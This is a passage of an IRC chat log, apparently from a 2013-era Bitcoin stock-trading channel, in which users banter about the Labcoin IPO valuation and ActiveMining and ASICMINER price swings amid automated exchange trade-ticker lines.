17:02:48 VanCleef stop being a kid son. Jul 31 17:03:11 sorry, actually making the point its fucking stupid Jul 31 17:03:20 yeah they're dancing around that part. since they initially invested 150k, maybe they value that worth 300k now, thus 700k for shareholders Jul 31 17:03:42 and there's proof of this 150k? Jul 31 17:03:43 [BTCTC] [TAT.MINIGAME] 1671 @ 0.0002889 = 0.4828 BTC [+] Jul 31 17:03:43 that's not really how it goes is it. Jul 31 17:03:55 [BTCTC] [ASICMINER-PT] 1 @ 4.176 BTC [-] Jul 31 17:04:16 [BTCTC] [TAT.MINIGAME] 3500 @ 0.000289 = 1.0115 BTC [+] Jul 31 17:05:35 [MPEX] [S.MG] 5000 @ 0.0002675 = 1.3375 BTC [+] Jul 31 17:05:42 aww wtf Jul 31 17:05:47 they banned me from their thread Jul 31 17:05:56 [BTCTC] [TAT.MINIGAME] 2500 @ 0.000294 = 0.735 BTC [+] Jul 31 17:05:58 who did Jul 31 17:06:01 labcoin>? Jul 31 17:06:03 labcoin guys Jul 31 17:06:12 because i exposed their bs valuation Jul 31 17:06:17 wow seriously? Jul 31 17:06:21 the ipo thread? Jul 31 17:06:21 yep Jul 31 17:06:29 how can they ban you from their thread Jul 31 17:06:54 [BTCTC] [TAT.MINIGAME] 3088 @ 0.000295 = 0.911 BTC [+] Jul 31 17:07:16 [MPEX] [S.MG] 5000 @ 0.0002675 = 1.3375 BTC [+] Jul 31 17:07:32 [BTCTC] [ASICMINER-PT] 10 @ 4.18 = 41.8 BTC [+] Jul 31 17:07:41 i went to hit replay and got this message saying notallowed to reply in it Jul 31 17:09:04 da fk Jul 31 17:09:22 [BTCTC] [ACTIVEMINING] 25 @ 0.004597 = 0.1149 BTC [+] Jul 31 17:09:31 [BTCTC] [ACTIVEMINING] 1 @ 0.0045 BTC [-] Jul 31 17:09:40 what's your forum handle? Jul 31 17:09:54 BitHub? Jul 31 17:10:17 ahh there it goes Jul 31 17:10:50 [HAVELOCK] [VTX] 1 @ 0.496 BTC [+] Jul 31 17:10:57 how is that possible even lol Jul 31 17:10:57 [HAVELOCK] [VTX] 2 @ 0.495 = 0.99 BTC [-] Jul 31 17:11:04 [HAVELOCK] [VTX] 1 @ 0.49130001 BTC [-] Jul 31 17:11:57 VanCleef [quote]Everything design wise, data modeling, virtual testing of cells, tape out etc. has been paid for and booked (approx $150.000) and now we need to take in capital for producing the actual chip.[/quote] Jul 31 17:12:12 okey i jumpt the gun a lil bit :P probaly just logged me out Jul 31 17:12:23 [HAVELOCK] [AM100] 1 @ 0.04039968 BTC [+] Jul 31 17:12:33 https://bitcointalk.org/index.php?topic=263445.msg2834383;topicseen#msg2834383 Jul 31 17:12:37 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 17:13:43 [BTCTC] [ASICMINER-PT] 1 @ 4.182 BTC [+] Jul 31 17:14:35 i wonder how much asicminer team costs Jul 31 17:14:40 alot cheaper i bet Jul 31 17:14:54 [HAVELOCK] [HIM] 10 @ 0.176 = 1.76 BTC [-] Jul 31 17:14:55 lol Jul 31 17:15:01 VanCleef thety did it all on about 100k dollars in 2012 iirc Jul 31 17:15:03 [HAVELOCK] [HIM] 2 @ 0.177 = 0.354 BTC [+] Jul 31 17:15:20 ahh yeah that's right Jul 31 17:15:36 100k, wow Jul 31 17:15:40 good stuff Jul 31 17:17:29 so these guys want 1 million dollars (lil bit more since bitcoin price went up) and value themselves at 300k? with 700k worth going to shareholders? Jul 31 17:18:14 okey i'm done breaking it down, will save it for pm mp Jul 31 17:19:28 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [+] Jul 31 17:19:31 need a labcoin chat Jul 31 17:19:32 btcgarden is still a classic at 16 million Jul 31 17:19:48 or a BTC-TC chan Jul 31 17:19:50 [BTCTC] [ACTIVEMINING] 378 @ 0.00422 = 1.5952 BTC [-] Jul 31 17:19:51 so people like mircea dont get all fussy Jul 31 17:20:30 i gave a new bitfunder ipo a valuation too Jul 31 17:20:39 yeahhhh BTC-TC trollbox Jul 31 17:20:39 some casino thing Jul 31 17:20:39 So basically nobody knows when the labcoin ipo will begin? Jul 31 17:20:49 [BTCTC] [ACTIVEMINING] 25 @ 0.004221 = 0.1055 BTC [+] Jul 31 17:20:50 8pm central! Jul 31 17:20:50 8pm central i think Jul 31 17:21:17 lol Jul 31 17:21:25 "The bottom line is the .001 price for the ipo is way too cheap." Jul 31 17:21:39 "Then the big buyers will make multiple accounts and afterwards transfer all shares to the main account." Jul 31 17:21:52 [BTCTC] [ACTIVEMINING] 357 @ 0.00422 = 1.5065 BTC [-] Jul 31 17:22:05 [BTCTC] [ACTIVEMINING] 75 @ 0.00422 = 0.3165 BTC [-] Jul 31 17:22:28 [BTCTC] [ACTIVEMINING] 18 @ 0.0076 = 0.1368 BTC [+] Jul 31 17:22:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.193 BTC [-] Jul 31 17:23:21 [BTCTC] [COGNITIVE] 3 @ 0.4438 = 1.3314 BTC [+] Jul 31 17:23:25 this shit cray Jul 31 17:24:17 clear the book! Jul 31 17:24:30 [BTCTC] [ACTIVEMINING] 40 @ 0.00422 = 0.1688 BTC [-] Jul 31 17:24:59 i just got a sms saying "sec's assholes foaming" Jul 31 17:25:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [+] Jul 31 17:26:59 hahah the sec can lick my foaming asshole Jul 31 17:27:46 afrotec you know you create channels on irc by simply joining them Jul 31 17:28:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.04171 = 0.0834 BTC [+] Jul 31 17:28:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.04172 = 0.1669 BTC [+] Jul 31 17:28:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.04172 BTC [+] Jul 31 17:28:31 yes i know Jul 31 17:28:50 currently the only one in #labcoin Jul 31 17:29:15 [BTCTC] [ACTIVEMINING] 25 @ 0.004593 = 0.1148 BTC [+] Jul 31 17:29:17 [BTCTC] [ACTIVEMINING] 400 @ 0.004594 = 1.8376 BTC [+] Jul 31 17:29:19 [BTCTC] [ACTIVEMINING] 841 @ 0.004596 = 3.8652 BTC [+] Jul 31 17:29:22 [BTCTC] [ACTIVEMINING] 300 @ 0.004597 = 1.3791 BTC [+] Jul 31 17:29:23 [BTCTC] [ACTIVEMINING] 1200 @ 0.004598 = 5.5176 BTC [+] Jul 31 17:29:25 [BTCTC] [ACTIVEMINING] 50 @ 0.004598 = 0.2299 BTC [+] Jul 31 17:29:27 [BTCTC] [ACTIVEMINING] 100 @ 0.004599 = 0.4599 BTC [+] Jul 31 17:29:29 [BTCTC] [ACTIVEMINING] 7 @ 0.0046 = 0.0322 BTC [+] Jul 31 17:29:31 [BTCTC] [ACTIVEMINING] 682 @ 0.004619 = 3.1502 BTC [+] Jul 31 17:29:35 [BTCTC] [ACTIVEMINING] 1388 @ 0.00462 = 6.4126 BTC [+] Jul 31 17:29:37 [BTCTC] [ACTIVEMINING] 480 @ 0.00469 = 2.2512 BTC [+] Jul 31 17:29:37 afrotec why is your asshole foaming? Jul 31 17:29:38 wow lol Jul 31 17:29:39 [BTCTC] [ACTIVEMINING] 5 @ 0.00495 = 0.0248 BTC [+] Jul 31 17:29:43 [BTCTC] [ACTIVEMINING] 525 @ 0.00496 = 2.604 BTC [+] Jul 31 17:29:44 this is the push Jul 31 17:29:54 [BTCTC] [ACTIVEMINING] 395 @ 0.00498 = 1.9671 BTC [+] Jul 31 17:29:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.04 = 0.08 BTC [-] Jul 31 17:29:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [-] Jul 31 17:29:57 [BTCTC] [ACTIVEMINING] 1411 @ 0.004989 = 7.0395 BTC [+] Jul 31 17:29:58 [BTCTC] [TAT.ASICMINER] 18 @ 0.04 = 0.72 BTC [-] Jul 31 17:29:59 cost all of 10 btc lol Jul 31 17:30:02 about time :) Jul 31 17:30:02 i recommend #smalltimer-nonsense Jul 31 17:30:09 [BTCTC] [ACTIVEMINING] 500 @ 0.00499 = 2.495 BTC [+] Jul 31 17:30:17 After this, I am done with amc Jul 31 17:30:26 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [-] Jul 31 17:30:45 [BTCTC] [ACTIVEMINING] 25 @ 0.004549 = 0.1137 BTC [-] Jul 31 17:30:51 Rulother_: AMC = ASICMINER? Jul 31 17:30:54 [BTCTC] [ACTIVEMINING] 20 @ 0.00455 = 0.091 BTC [+] Jul 31 17:30:54 Sorry Jul 31 17:30:56 [BTCTC] [ACTIVEMINING] 50 @ 0.004959 = 0.248 BTC [+] Jul 31 17:30:57 sigh Jul 31 17:30:59 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [+] Jul 31 17:31:09 [BTCTC] [ACTIVEMINING] 5 @ 0.005298 = 0.0265 BTC [+] Jul 31 17:31:11 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Jul 31 17:31:15 [BTCTC] [ACTIVEMINING] 52 @ 0.00549 = 0.2855 BTC [+] Jul 31 17:31:16 even more reason why I hate the company lol Jul 31 17:31:17 [BTCTC] [ACTIVEMINING] 64 @ 0.005499 = 0.3519 BTC [+] Jul 31 17:31:18 [BTCTC] [ACTIVEMINING] 5000 @ 0.0055 = 27.5 BTC [+] Jul 31 17:31:20 [BTCTC] [ACTIVEMINING] 100 @ 0.0056 = 0.56 BTC [+] Jul 31 17:31:21 [BTCTC] [ACTIVEMINING] 55 @ 0.00585 = 0.3218 BTC [+] Jul 31 17:31:24 [BTCTC] [ACTIVEMINING] 11 @ 0.00589 = 0.0648 BTC [+] Jul 31 17:31:26 [BTCTC] [ACTIVEMINING] 200 @ 0.00589 = 1.178 BTC [+] Jul 31 17:31:28 [BTCTC] [ACTIVEMINING] 200 @ 0.005998 = 1.1996 BTC [+] Jul 31 17:31:30 [BTCTC] [ACTIVEMINING] 5000 @ 0.005999 = 29.995 BTC [+] Jul 31 17:31:48 why doy ou hate asicminer? Jul 31 17:31:53 [BTCTC] [COGNITIVE] 2 @ 0.4437 = 0.8874 BTC [-] Jul 31 17:31:55 [BTCTC] [COGNITIVE] 1 @ 0.43 BTC [-] Jul 31 17:31:57 [BTCTC] [COGNITIVE] 7 @ 0.43 = 3.01 BTC [-] Jul 31 17:31:59 [BTCTC] [COGNITIVE] 1 @ 0.424 BTC [-] Jul 31 17:31:59 :) Jul 31 17:32:11 Not am... amc... activemining Jul 31 17:32:15 [BTCTC] [COGNITIVE] 1 @ 0.42 BTC [-] Jul 31 17:32:17 [BTCTC] [COGNITIVE] 2 @ 0.41 = 0.82 BTC [-] Jul 31 17:32:54 rofl, spread on AMC is 33% of share price Jul 31 17:33:08 i trust ken from asicminer more than friedcat from activeminer Jul 31 17:33:08 [HAVELOCK] [SMG] 2 @ 0.0002695 = 0.0005 BTC [-] Jul 31 17:33:33 lolwut Jul 31 17:33:34 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jul 31 17:33:41 ;) Jul 31 17:33:50 just wanna make mp giggle Jul 31 17:34:22 [BTCTC] [LTC-ATF.B2] 9 @ 0.01042 = 0.0938 BTC [+] Jul 31 17:34:24 me too Jul 31 17:34:52 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jul 31 17:34:54 [BTCTC] [COGNITIVE] 13 @ 0.4001 = 5.2013 BTC [-] Jul 31 17:34:56 [BTCTC] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [-] Jul 31 17:35:12 16:30 < jurov> i recommend #smalltimer-nonsense Jul 31 17:35:13 ^^ Jul 31 17:35:29 [BTCTC] [COGNITIVE] 6 @ 0.395 = 2.37 BTC [-] Jul 31 17:35:52 hmmmm Jul 31 17:36:01 [BTCTC] [CRYPTO-TRADE] 2 @ 0.192 = 0.384 BTC [-] Jul 31 17:36:09 FabianB: I thought that was a real channel :) Jul 31 17:36:48 It's funny the amount of people jumping ship from all kinds of stocks for the new new Jul 31 17:37:49 looks like a million noobs appearing today in here; backlog reads 'different' than on usual days Jul 31 17:37:51 I think nearly every stock met their 30/60 day low within the past 48hrs Jul 31 17:38:07 [BTCTC] [COGNITIVE] 5 @ 0.4 = 2 BTC [+] Jul 31 17:39:12 [BTCTC] [COGNITIVE] 5 @ 0.73 = 3.65 BTC [+] Jul 31 17:40:14 FabianB i was wondering the same thing. Jul 31 17:40:19 announcement: i'm selling a bid place bot for btct for 15 bitcoin. Jul 31 17:40:25 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 31 17:40:28 !ticker m s.mpoe Jul 31 17:40:29 jk ;) Jul 31 17:40:30 [MPEX:S.MPOE] 1D: 0.00079398 / 0.000806 / 0.0008116 (256303 shares, 206.58 BTC), 7D: 0.0007725 / 0.00080393 / 0.00087344 (2330799 shares, 1,873.81 BTC), 30D: 0.0007725 / 0.00081687 / 0.00097228 (10510549 shares, 8,585.81 BTC) Jul 31 17:40:30 what a day of chaos Jul 31 17:40:35 Rulother_ ^ Jul 31 17:40:43 more to come afrotec Jul 31 17:40:59 i dont mind, makes it easy to not work ;) Jul 31 17:41:04 I would probably pay 10 btc for a bid bot Jul 31 17:41:07 for btct Jul 31 17:41:27 I would have to see the coding myself Jul 31 17:41:38 I could probably do it, but I got this thing called laziness Jul 31 17:42:27 mircea_popescu: if all days are like today here, i'll need to hire a summary girl or we need an invite only channel with a 10 btc fee Jul 31 17:43:16 lmao Jul 31 17:43:37 honestly i think people are trying to learn. we see. Jul 31 17:44:03 Well that's a good thing too, more users the more influx of money too. Jul 31 17:44:26 Patience Jul 31 17:44:31 Rulother_: money for what? Jul 31 17:44:34 [BTCTC] [ACTIVEMINING] 1 @ 0.005724 BTC [-] Jul 31 17:44:47 btct or just btc in general really Jul 31 17:45:11 i would like to learn alot more Jul 31 17:45:24 investopedia is okey Jul 31 17:45:52 there's fixed 3600 new btc daily Jul 31 17:46:00 mp's blog thingy Jul 31 17:46:39 I understand that :) But still more people using btc the better, and more interested in btct the better as well, at least that's the way I feel as an investor. Jul 31 17:46:39 money for nothing and the chicks for free? Jul 31 17:47:07 Rulother_ it's more complicated than more people = better tho. Jul 31 17:47:11 [HAVELOCK] [AM100] 5 @ 0.0403999 = 0.202 BTC [+] Jul 31 17:47:14 Rulother_: investing or speculating? Jul 31 17:47:18 many people listen to britney spears, never made her any better. Jul 31 17:47:27 LEAVE BRITNEY ALONE Jul 31 17:47:31 well you got me there mp Jul 31 17:47:47 also Rulother_ what do you want the bot to do, ill take your money Jul 31 17:48:37 kako, buy labcoin Jul 31 17:48:50 I'm still working on the details myself, been putting together an outline just in case I do end up coding one. Jul 31 17:48:57 Got some research to do first Jul 31 17:49:02 O_o Jul 31 17:49:13 [BTCTC] [ACTIVEMINING] 25 @ 0.005719 = 0.143 BTC [-] Jul 31 17:49:30 [BTCTC] [ACTIVEMINING] 17 @ 0.005719 = 0.0972 BTC [-] Jul 31 17:49:48 [BTCTC] [ACTIVEMINING] 17 @ 0.005718 = 0.0972 BTC [-] Jul 31 17:49:52 [BTCTC] [ASICMINER-PT] 1 @ 4.275 BTC [+] Jul 31 17:49:54 can anyone create a script to make ipo's all day? Jul 31 17:50:11 ? Jul 31 17:50:26 [BTCTC] [ACTIVEMINING] 1 @ 0.005621 BTC [-] Jul 31 17:50:31 it starts off by posting a thread on bitcointalk Jul 31 17:50:40 lmao Jul 31 17:50:42 [BTCTC] [ACTIVEMINING] 49 @ 0.005621 = 0.2754 BTC [-] Jul 31 17:50:45 [BTCTC] [ACTIVEMINING] 27 @ 0.005619 = 0.1517 BTC [-] Jul 31 17:50:50 need to ipo the litecoin asic Jul 31 17:50:56 then it creates some irc bots to talk about it in bitcoin rooms Jul 31 17:51:00 not a bad idea, ipo text generator Jul 31 17:51:22 based on bitcoin agent Jul 31 17:51:45 [HAVELOCK] [AM100] 47 @ 0.0403999 = 1.8988 BTC [+] Jul 31 17:51:53 Name it Ben Jul 31 17:52:28 ./ipobot.sh Jul 31 17:52:30 don't forget btct prospect generation Jul 31 17:54:22 [BTCTC] [ACTIVEMINING] 50 @ 0.005719 = 0.286 BTC [+] Jul 31 17:54:24 [BTCTC] [ACTIVEMINING] 17 @ 0.00572 = 0.0972 BTC [+] Jul 31 17:54:26 [BTCTC] [ACTIVEMINING] 233 @ 0.00572 = 1.3328 BTC [+] Jul 31 17:55:29 [BTCTC] [ASICMINER-PT] 1 @ 4.28 BTC [+] Jul 31 17:55:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005599 = 0.14 BTC [-] Jul 31 17:55:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005599 = 0.14 BTC [-] Jul 31 17:55:51 [BTCTC] [ACTIVEMINING] 5 @ 0.0056 = 0.028 BTC [+] Jul 31 17:57:20 [BTCTC] [ACTIVEMINING] 1438 @ 0.004856 = 6.9829 BTC [-] Jul 31 17:57:22 [BTCTC] [ASICMINER-PT] 1 @ 4.188 BTC [-] Jul 31 17:57:24 [BTCTC] [ACTIVEMINING] 225 @ 0.004855 = 1.0924 BTC [-] Jul 31 17:57:26 [BTCTC] [ACTIVEMINING] 50 @ 0.004852 = 0.2426 BTC [-] Jul 31 17:57:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [+] Jul 31 17:57:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.00464 = 4.64 BTC [-] Jul 31 17:57:45 looks like the books will stay Jul 31 17:57:47 [BTCTC] [ACTIVEMINING] 123 @ 0.004631 = 0.5696 BTC [-] Jul 31 17:57:54 for now Jul 31 17:58:00 [BTCTC] [ACTIVEMINING] 700 @ 0.00461 = 3.227 BTC [-] Jul 31 17:58:02 [BTCTC] [ACTIVEMINING] 500 @ 0.004606 = 2.303 BTC [-] Jul 31 17:58:05 [BTCTC] [ACTIVEMINING] 500 @ 0.0046 = 2.3 BTC [-] Jul 31 17:58:39 [BTCTC] [ACTIVEMINING] 430 @ 0.004409 = 1.8959 BTC [-] Jul 31 17:58:41 [BTCTC] [ACTIVEMINING] 1500 @ 0.0043 = 6.45 BTC [-] Jul 31 17:58:44 [BTCTC] [ACTIVEMINING] 1100 @ 0.004226 = 4.6486 BTC [-] Jul 31 17:59:00 what happened to activemining Jul 31 17:59:02 dayum Jul 31 17:59:08 [HAVELOCK] [AM100] 9 @ 0.0403999 = 0.3636 BTC [+] Jul 31 17:59:23 [BTCTC] [ASICMINER-PT] 1 @ 4.288 BTC [+] Jul 31 17:59:23 it went up up up Jul 31 17:59:28 in an alternative manner Jul 31 17:59:37 negative up Jul 31 17:59:45 [BTCTC] [S.BBET-PT] 9 @ 0.002029 = 0.0183 BTC [+] Jul 31 18:01:55 actm sale Jul 31 18:02:31 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [+] Jul 31 18:02:33 [BTCTC] [ASICMINER-PT] 1 @ 4.186 BTC [-] Jul 31 18:02:36 [BTCTC] [ACTIVEMINING] 500 @ 0.005 = 2.5 BTC [-] Jul 31 18:02:48 [BTCTC] [S.MPOE-PT] 11 @ 0.00084 = 0.0092 BTC [-] Jul 31 18:02:56 [BTCTC] [S.MPOE-PT] 9 @ 0.0008328 = 0.0075 BTC [-] Jul 31 18:03:08 [BTCTC] [ACTIVEMINING] 25 @ 0.005 = 0.125 BTC [-] Jul 31 18:03:24 [BTCTC] [ASICMINER-PT] 1 @ 4.185 BTC [-] Jul 31 18:04:05 [BTCTC] [ACTIVEMINING] 2 @ 0.00441 = 0.0088 BTC [-] Jul 31 18:04:35 [BTCTC] [ACTIVEMINING] 25 @ 0.004829 = 0.1207 BTC [+] Jul 31 18:04:37 [BTCTC] [ACTIVEMINING] 41 @ 0.00483 = 0.198 BTC [+] Jul 31 18:04:39 [BTCTC] [ACTIVEMINING] 50 @ 0.004999 = 0.25 BTC [+] Jul 31 18:04:40 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [+] Jul 31 18:05:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.03955 = 0.1582 BTC [-] Jul 31 18:05:51 [BTCTC] [ACTIVEMINING] 25 @ 0.00483 = 0.1208 BTC [-] Jul 31 18:05:53 [BTCTC] [ACTIVEMINING] 200 @ 0.004829 = 0.9658 BTC [-] Jul 31 18:06:24 [BTCTC] [ACTIVEMINING] 12 @ 0.005001 = 0.06 BTC [+] Jul 31 18:07:27 [BTCTC] [ACTIVEMINING] 25 @ 0.004831 = 0.1208 BTC [-] Jul 31 18:07:29 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [+] Jul 31 18:07:31 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195 = 0.585 BTC [+] Jul 31 18:07:33 [BTCTC] [ACTIVEMINING] 280 @ 0.00483 = 1.3524 BTC [-] Jul 31 18:07:52 [BTCTC] [ACTIVEMINING] 25 @ 0.004831 = 0.1208 BTC [+] Jul 31 18:10:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04199 BTC [+] Jul 31 18:12:14 [BTCTC] [ACTIVEMINING] 25 @ 0.004787 = 0.1197 BTC [-] Jul 31 18:12:50 [BTCTC] [ASICMINER-PT] 1 @ 4.286 BTC [+] Jul 31 18:13:24 [BTCTC] [ACTIVEMINING] 25 @ 0.004787 = 0.1197 BTC [-] Jul 31 18:13:26 [BTCTC] [ACTIVEMINING] 50 @ 0.004788 = 0.2394 BTC [+] Jul 31 18:13:29 [BTCTC] [ACTIVEMINING] 8 @ 0.00479 = 0.0383 BTC [+] Jul 31 18:13:31 [BTCTC] [ACTIVEMINING] 27 @ 0.004828 = 0.1304 BTC [+] Jul 31 18:13:33 [BTCTC] [ACTIVEMINING] 80 @ 0.00483 = 0.3864 BTC [+] Jul 31 18:14:05 [BTCTC] [ACTIVEMINING] 1 @ 0.004709 BTC [-] Jul 31 18:14:40 [HAVELOCK] [AM100] 35 @ 0.0403999 = 1.414 BTC [+] Jul 31 18:14:47 [BTCTC] [ACTIVEMINING] 25 @ 0.004621 = 0.1155 BTC [-] Jul 31 18:14:49 [BTCTC] [ACTIVEMINING] 630 @ 0.00462 = 2.9106 BTC [-] Jul 31 18:15:34 [BTCTC] [ACTIVEMINING] 50 @ 0.00462 = 0.231 BTC [-] Jul 31 18:15:37 [BTCTC] [ASICMINER-PT] 1 @ 4.194 BTC [-] Jul 31 18:16:06 [BTCTC] [ACTIVEMINING] 25 @ 0.00462 = 0.1155 BTC [-] Jul 31 18:16:37 [BTCTC] [ACTIVEMINING] 50 @ 0.004612 = 0.2306 BTC [-] Jul 31 18:16:40 [BTCTC] [ACTIVEMINING] 50 @ 0.004602 = 0.2301 BTC [-] Jul 31 18:16:46 [BTCTC] [ACTIVEMINING] 250 @ 0.004602 = 1.1505 BTC [-] Jul 31 18:16:50 [BTCTC] [ACTIVEMINING] 20 @ 0.00462 = 0.0924 BTC [+] Jul 31 18:16:56 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [-] Jul 31 18:16:58 [BTCTC] [ACTIVEMINING] 250 @ 0.00462 = 1.155 BTC [+] Jul 31 18:17:00 [BTCTC] [ASICMINER-PT] 1 @ 4.194 BTC [+] Jul 31 18:17:27 [BTCTC] [ASICMINER-PT] 1 @ 4.194 BTC [+] Jul 31 18:17:28 [BTCTC] [ACTIVEMINING] 25 @ 0.004709 = 0.1177 BTC [+] Jul 31 18:17:30 [BTCTC] [ACTIVEMINING] 11 @ 0.00471 = 0.0518 BTC [+] Jul 31 18:17:34 [BTCTC] [ACTIVEMINING] 70 @ 0.00483 = 0.3381 BTC [+] Jul 31 18:17:36 [BTCTC] [ACTIVEMINING] 12 @ 0.00505 = 0.0606 BTC [+] Jul 31 18:17:58 [BTCTC] [ACTIVEMINING] 50 @ 0.00451 = 0.2255 BTC [-] Jul 31 18:18:02 [BTCTC] [ACTIVEMINING] 611 @ 0.004506 = 2.7532 BTC [-] Jul 31 18:18:04 [BTCTC] [ACTIVEMINING] 441 @ 0.004505 = 1.9867 BTC [-] Jul 31 18:18:08 [BTCTC] [ACTIVEMINING] 398 @ 0.004504 = 1.7926 BTC [-] Jul 31 18:19:11 [HAVELOCK] [AM100] 6 @ 0.0403999 = 0.2424 BTC [+] Jul 31 18:19:26 [MPEX] [S.MG] 3333 @ 0.0002675 = 0.8916 BTC [+] Jul 31 18:20:37 [BTCTC] [ACTIVEMINING] 25 @ 0.004947 = 0.1237 BTC [+] Jul 31 18:20:39 [BTCTC] [ACTIVEMINING] 575 @ 0.004948 = 2.8451 BTC [+] Jul 31 18:22:16 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [-] Jul 31 18:22:20 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [-] Jul 31 18:22:24 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [-] Jul 31 18:22:39 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [-] Jul 31 18:22:43 [BTCTC] [ASICMINER-PT] 1 @ 4.192 BTC [-] Jul 31 18:22:54 [BTCTC] [ASICMINER-PT] 10 @ 4.191 = 41.91 BTC [-] Jul 31 18:22:57 [BTCTC] [ASICMINER-PT] 1 @ 4.184 BTC [-] Jul 31 18:23:00 [BTCTC] [ASICMINER-PT] 2 @ 4.183 = 8.366 BTC [-] Jul 31 18:23:05 [BTCTC] [ASICMINER-PT] 1 @ 4.182 BTC [-] Jul 31 18:23:08 [BTCTC] [ASICMINER-PT] 3 @ 4.181 = 12.543 BTC [-] Jul 31 18:23:11 [BTCTC] [ASICMINER-PT] 2 @ 4.178 = 8.356 BTC [-] Jul 31 18:23:14 [BTCTC] [ASICMINER-PT] 5 @ 4.176 = 20.88 BTC [-] Jul 31 18:23:18 [BTCTC] [ASICMINER-PT] 6 @ 4.175 = 25.05 BTC [-] Jul 31 18:23:22 [BTCTC] [ASICMINER-PT] 10 @ 4.15 = 41.5 BTC [-] Jul 31 18:23:25 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [-] Jul 31 18:23:29 [BTCTC] [ASICMINER-PT] 11 @ 4.101 = 45.111 BTC [-] Jul 31 18:23:34 [BTCTC] [ASICMINER-PT] 14 @ 4.101 = 57.414 BTC [-] Jul 31 18:23:37 [BTCTC] [ASICMINER-PT] 15 @ 4.1 = 61.5 BTC [-] Jul 31 18:23:41 [BTCTC] [ASICMINER-PT] 2 @ 4.09 = 8.18 BTC [-] Jul 31 18:23:43 [BTCTC] [ASICMINER-PT] 2 @ 4.084 = 8.168 BTC [-] Jul 31 18:23:46 [BTCTC] [ASICMINER-PT] 2 @ 4.08 = 8.16 BTC [-] Jul 31 18:23:48 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [-] Jul 31 18:23:51 [BTCTC] [ASICMINER-PT] 1 @ 4.062 BTC [-] Jul 31 18:23:53 [BTCTC] [ASICMINER-PT] 1 @ 4.053 BTC [-] Jul 31 18:23:56 [BTCTC] [ASICMINER-PT] 2 @ 4.052 = 8.104 BTC [-] Jul 31 18:23:59 [BTCTC] [ASICMINER-PT] 15 @ 4.051 = 60.765 BTC [-] Jul 31 18:24:13 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [-] Jul 31 18:24:15 [BTCTC] [ASICMINER-PT] 3 @ 4.01 = 12.03 BTC [-] Jul 31 18:24:19 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 31 18:24:22 [BTCTC] [ASICMINER-PT] 1 @ 4.006 BTC [-] Jul 31 18:24:28 [BTCTC] [ASICMINER-PT] 1 @ 4.002 BTC [-] Jul 31 18:24:33 [BTCTC] [ASICMINER-PT] 9 @ 4 = 36 BTC [-] Jul 31 18:24:40 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 31 18:24:45 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 31 18:24:48 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 31 18:24:54 [BTCTC] [ASICMINER-PT] 17 @ 4 = 68 BTC [-] Jul 31 18:24:59 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 31 18:25:15 [BTCTC] [ASICMINER-PT] 1 @ 3.93 BTC [-] Jul 31 18:25:39 [BTCTC] [ASICMINER-PT] 5 @ 3.93 = 19.65 BTC [-] Jul 31 18:25:49 [BTCTC] [ACTIVEMINING] 19 @ 0.004588 = 0.0872 BTC [-] Jul 31 18:25:51 [BTCTC] [ACTIVEMINING] 19 @ 0.004589 = 0.0872 BTC [+] Jul 31 18:26:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03957 BTC [-] Jul 31 18:26:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.03957 = 0.277 BTC [-] Jul 31 18:26:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.03956 = 0.5934 BTC [-] Jul 31 18:26:36 [BTCTC] [TAT.ASICMINER] 15 @ 0.03951 = 0.5927 BTC [-] Jul 31 18:26:39 [BTCTC] [TAT.ASICMINER] 30 @ 0.0395 = 1.185 BTC [-] Jul 31 18:26:41 [BTCTC] [TAT.ASICMINER] 47 @ 0.03921 = 1.8429 BTC [-] Jul 31 18:26:45 [BTCTC] [TAT.ASICMINER] 95 @ 0.0392 = 3.724 BTC [-] Jul 31 18:27:32 hm Jul 31 18:28:32 hey smidge Jul 31 18:29:02 any more development on issuing shares of the holding company that is smidge, not a fund Jul 31 18:30:19 not atm. it doesnt make sense to sell shares of the holding when we dont have multiple funds out there (meaning successful ipos) Jul 31 18:31:02 ok, now that i've bought almost everything cheap, can you pls cancel the labcoin ipo so that the coins move back into the other assets, kthx Jul 31 18:32:23 i'm holding out for the company Jul 31 18:32:28 [BTCTC] [ACTIVEMINING] 